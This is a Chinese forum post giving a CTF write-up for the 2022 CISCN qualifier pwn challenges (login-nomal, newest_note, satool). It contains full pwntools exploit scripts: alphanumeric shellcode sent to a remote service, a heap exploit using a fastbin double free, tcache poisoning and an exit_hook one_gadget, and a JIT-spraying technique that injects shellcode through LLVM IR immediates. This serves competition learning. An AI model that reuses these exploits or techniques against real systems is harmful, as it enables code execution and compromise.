首页
社区
课程
招聘
[原创]2022 CISCN 初赛pwn完整wp
2022-6-9 11:17 15727

[原创]2022 CISCN 初赛pwn完整wp

2022-6-9 11:17
15727

把前几天写的wp整理一下合成一篇文章发出来

Login-nomal

先进入root模式然后直接进入backdoor执行shellcode,要求shellcode是可见字符,且是用call rdx调用的,直接AE64生成一下就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from re import L
from pwn import *
from ctypes import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
#elf=ELF('./pwn')
io = remote('59.110.24.117',33320)
libc = ELF('./libc-2.33.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
#gdb.attach(io,'b*$rebase(0xe64)\nb*$rebase(0xe64)')
payload='opt:1 \nmsg:ro0t\r\n'
shellcode = '''
TAYAXVI31VXPP[_Hc4:14:SX-}/?w-x0An5C+{(P^14:WX-@``?-@??_-|``aP_Hc4:14:SX-]oN}-08/P5;W-vP^14:WX-@``?-@??_-|``aP_Hc4:14:SX-!/o>-uTX 5Xtp(P^14:WX-@``?-@??_-|``aP_Hc4:14:SX-~~/?-?!0,5GZ#SP^14:WX-@``?-@??_-|``aP_Hc4:14:SX-^;?}-w" Z5#!f8P^14:WX-@``?-@??_-|``aP_Hc4:14:SX- ?^;-@@~@5%@VlP^14:WX-@``?-@??_-|``aP_SX- h#F- 9^@5X_~yP_Hc4:14:SX-W?/6-!@  5wb 9P^14:WX-@``?-@??_-|``aP_SX-.1o_-0wpx5>V (P^SX-@~~7-Maaw5k  QP_AAAA|4oGf6^@nww`SjMMkct?=/w!{~?"uJ-'(R6sF`VUmo}r__#33Vavp~0tS<ZTC?Q-
'''.strip('\n')
sla(">>> ",payload)
payload='opt:2 \nmsg:'+shellcode+'\r\n'
sla(">>> ",payload)
irt()

newest_note

上来就怼了个整型溢出,直接让hepa_num为0x40040000,就可以让这个存堆指针的堆申请到libc上面,并且后面free和show的时候相当于都没有了index限制
在这里插入图片描述
所以直接用show打印main_arena上的libc内指针即可泄露libc,然后申请9个chunk,释放一个泄露堆地址,再释放六个填满tcache,然后再利用fastbin做一个double free(因为free之后没有清空指针,所以还存在一个UAF),但是说实话就算没有这个UAF,因为可以随便free,所以一样有UAF的效果。

 

然后申请七个出来,这样下次再申请就会从fastbin里拿,此时我们的bin结构应该是这样的:
在这里插入图片描述

 

然后修改第一个放进fastbin的chunk的fd,记得注意一下指针异或,这里先将fd改成system,来测试一下我们是否能做到任意地址申请。
在这里插入图片描述

 

可以看到system已经被我链入tcache链了,接下来就要考虑修改哪里的地址可以控制执行流,比赛的时候是用exit_hook做的,2.31之后的exit_hook稍微有点难找:
在这里插入图片描述

 

但是遗憾的是这里的rbx在2.34-3.2就不可写了,好在比赛的时候给的是3.0,所以还是可写的。

 

具体偏移我是选择的手动调到这里直接看的,也不是很深,不会很难找

 

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
from re import L
from pwn import *
from ctypes import *
#context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
io = process(['./pwn'],env={"LD_PRELOAD":"./libc.so.6-remote"})
#elf=ELF('./pwn')
 
#io = remote('59.110.24.117',33320)
libc = ELF('./libc.so.6-remote')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def menu(choice):
    sla(": ",str(choice))
def add(index,context):
    menu(1)
    sla("Index: ",str(index))
    sa("Content: ",context)
def free(index):
    menu(2)
    sla("Index: ",str(index))
def show(index):
    menu(3)
    sla("Index: ",str(index))
sla("How many pages your notebook will be? :",str(0x40040000))
show((0x7f99c17fbcd0-0x7f99c13df000)/8)
ru("Content: ")
libcbase=u64(io.recv(6).ljust(8,'\x00'))-(0x7f628e78dcc0-0x7f628e574000-0x1000)       
system=libcbase+libc.sym['system']
onegadget=libcbase+0xeeccc
lg("onegadget")
lg("libcbase")
for i in range(9):
        add(i,'a'*8)
free(0)
show(0)
ru("Content: ")
heapbase=u64(io.recv(5).ljust(8,'\x00'))
heapbase=heapbase<<12
lg("heapbase")
for i in range(1,7):
        free(i)
free(7)
free(8)
free(7)
target=((heapbase+0x450)>>12)^(libcbase+0x7f1b28d456c0-0x7f1b28b2b000)
lg("target")
for i in range(7):
        add(i,'a'*8)
add(7,p64(target))
add(7,p64(0))
add(7,p64(0))
add(7,p64(onegadget)*2)
gdb.attach(io)
menu(4)
irt()

打通效果图:
在这里插入图片描述

Satool

首先从readme入手:
在这里插入图片描述

 

从这个readme我们可以得到的信息还是不少的,首先由于题目没给opt(这里必须大声谴责出题人,劳资换了三个虚拟机编译了不下五次llvm-12,编译出来的opt全都load不了这个mbaPass.so,后来发现原来直接apt install llvm-12就可以,可是我最常用的虚拟机是ubuntu18,它最高只支持到apt install llvm-10,搞得我以为12及以上必须自己用源码编译,我真的吐了啊 )所以我们首先要知道用的是什么版本的opt,然后给了一个如何运行的命令,之后的内容告诉了我们这个PASS做了什么,显式的来看,其功能就是压缩优化IR指令,并且这个so限制了IR指令只能是add,sub或者ret

 

接下来把so文件拖进IDA中,首先肯定是找到runOnFunction:
在这里插入图片描述

 

可以看到首先是对函数里的参数和基本块数量做了限制,必须有且仅有一个参数和一个基本块,然后是通过handle函数对IR代码进行处理,处理后执行callcode,先来看callcode:
在这里插入图片描述
发现是直接执行this[4],再回过头来看,发现this[4]首先通过mprotect开辟了一块可读可写的内存,然后调用handle,那这个函数必然是往这里写shellcode,然后再把这块内存变成可读可执行,然后用callcode去执行,所以关键就在于handle是如何把IR变成shellcode的,这个过程其实可以理解成是一种JIT(即时编译),所以this[4]就是一个用于JIT的缓冲区。

 

接下来上重头戏——handle函数:
在这里插入图片描述

 

这里可以分析出v30其实是被当做了buf的结尾,然后遍历每一条IR指令,this+5指向当前shellcode,this+4指向缓冲区头部,然后通过调用writeMovImm64或者writeRet这一类指令向ptr指向的位置写shellcode并移动ptr,我们来看看上述函数怎么实现的:
在这里插入图片描述

 

从名字上来看这应该是一个通过mov写寄存器的指令,首先写一个0x48代表什么?这里就要求大家对机器码有一定的熟悉才能反应过来,当然反应不过来没关系,我们来试试就知道了,首先是0x48 然后写 0xbb或者0xb8 ,然后写一个八字节的数,这个64位的数从哪来:
在这里插入图片描述

 

可以看到是第三个参数,而这个参数来自IR指令

 

所以我们写一个例子,比如0x48 0xbb 0x1122334455667788,然后反编译一下:
在这里插入图片描述
可以看到写进去的内容在callcode执行的时候会当做

1
movabs rbx, 0x1122334455667788

这条指令来执行,同理我们能够得知,当0xbb变成0xb8的时候写的是movabs rax,xxx

 

在这里插入图片描述

 

writeRet函数显然就是写一个ret指令进去,其他一些函数对机器码不熟悉的话都可以通过上述这种操作调试出来。

 

所以现在我们知道了,程序在做的事情就是把IR代码编译成机器码并运行,我们简单的调试一下看看,我们将断点断在callcode那里,然后exp.ll里面随便写上几句合法的指令:
exp.ll

1
2
3
4
5
6
7
8
9
10
define dso_local i64 @pwn(i64 %0) local_unnamed_addr #0 {
  %2 = add nsw i64 %0, 21732277098
  %3 = add nsw i64 %2, 426533919260756112
  %4 = add nsw i64 %3, 426712264860536976
  %5 = add nsw i64 %4, 426555988614513992
  %6 = add nsw i64 %5, 426470739404150928
  %7 = add nsw i64 %6, 426435038325729424
  %8 = add nsw i64 %7, 20000000000000
  ret i64 %8
}

然后看一下当程序运行到即将调用buf的时候,buf里的shellcode长啥样:
在这里插入图片描述

 

到这里我们应该已经算是彻底搞懂这个程序的主要功能了,要注意一下,我们写的IR指令和弄出来的shellcode是倒序的关系,因为里面用了stack。

 

接下来开始打这个题。
首选先要找到漏洞点在哪里,大致猜测一下,既然能执行shellcode,那是不是就要通过一定的手段来做到在buf上执行可控的shellcode,能做到这一点显然程序就好打了,但是现在的情况是,我们只能写这么几种已知的指令,只有数据是可控的,比如mov rbx,xxx中的xxx是可控的。

 

此时注意到这里:
在这里插入图片描述
明明缓冲区的大小是0x1000,这里凭什么就直接把buf+0xff0当做结束点?那这么做会引发什么问题呢?当生成的shellcode长度超过0xff0的时候就不再进行解析了,但是执行的时候并不会在0xff0停止,仍然会向下继续执行,并且对每个函数进行JIT的时候并没有清空缓冲区,也就是说当前函数在执行callcode的时候,buf里是可能会存有以前生成的shellcode,最后一点,我们的立即数是有条件写到0xff0以后的位置的,比如已经生成了0xff0-2这么长的shellcode,此时你来一个add rax,xxx,那么这个xxx就会写到0xff0~0xff7处。

 

梳理一下,现在0xff0之后有八个字节可控,假设我们第一次JIT的时候,在0xff0处把一个短跳转指令当做数据写进去,然后第二次JIT的时候让shellcode长度刚好等于0xff0,这样当第二次JIT生成的shellcode执行结束,就回去执行我们写的jmp指令,这样就成功控制了执行流,我们来尝试一下

 

首先是第一次JIT,0xff0处的八字节装的是movabs rbx,xxx里的数据,然后buf的末尾填充的是ret指令,执行起来没有任何问题
在这里插入图片描述

 

但是如果直接把0xff0处当做shellcode来看:
在这里插入图片描述

 

会发现我们输入的数据其实是一个短跳转指令,前两个为什么用nop填充是因为每种指令的机器码长度都是固定的,不一定能够凑出来刚好0xff0大小的shellcode,所以留两字节空位给正常的shellcode。

 

接下来是第二次JIT,我们让程序生成0xff2大小的shellcode:
在这里插入图片描述

 

这样就达到了我们想要的效果,成功将jmp指令注入到了JIT生成的shellcode中。

 

接下来要考虑的问题是让shellcode跳到哪里,我们可控的区域只有每个movasb指令中的立即数部分,每个是八字节,也就是说我们只需要再安排几个movabs指令,让其中两个字节用作短跳转,六个字节用作shellcode,就可以完成一串正常的shellcode了,虽然想想有点麻烦,但是道理上是可行的。

 

在写的时候要注意,不能有任何一条汇编指令长度大于6,否则写不进去,并且由于shellcode写起来很麻烦,所以还是推荐自己写shellcode,不要直接shellcraft.sh,那个生成出来的多少有点长。

 

由于对指令长度有限制,所以在构造/bin/sh的时候要先给寄存器低位赋值,然后把寄存器左移再相加

 

在这里插入图片描述

 

可以看到通过这种方式可以将一片一片分开的shellcode连接到一起,最后执行到syscall:
在这里插入图片描述

 

成功打通:
在这里插入图片描述


[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界

收藏
点赞5
打赏
分享
最新回复 (1)
雪    币: 26435
活跃值: (18467)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
kanxue 8 2022-6-10 21:24
2
0

login-nomal 部署到线上:http://kctf.kanxue.com/challenges#login-nomal-41  


题目提供的libc-2.33.so,部署的是libc-2.23.so

上传的附件:
游客
登录 | 注册 方可回帖
返回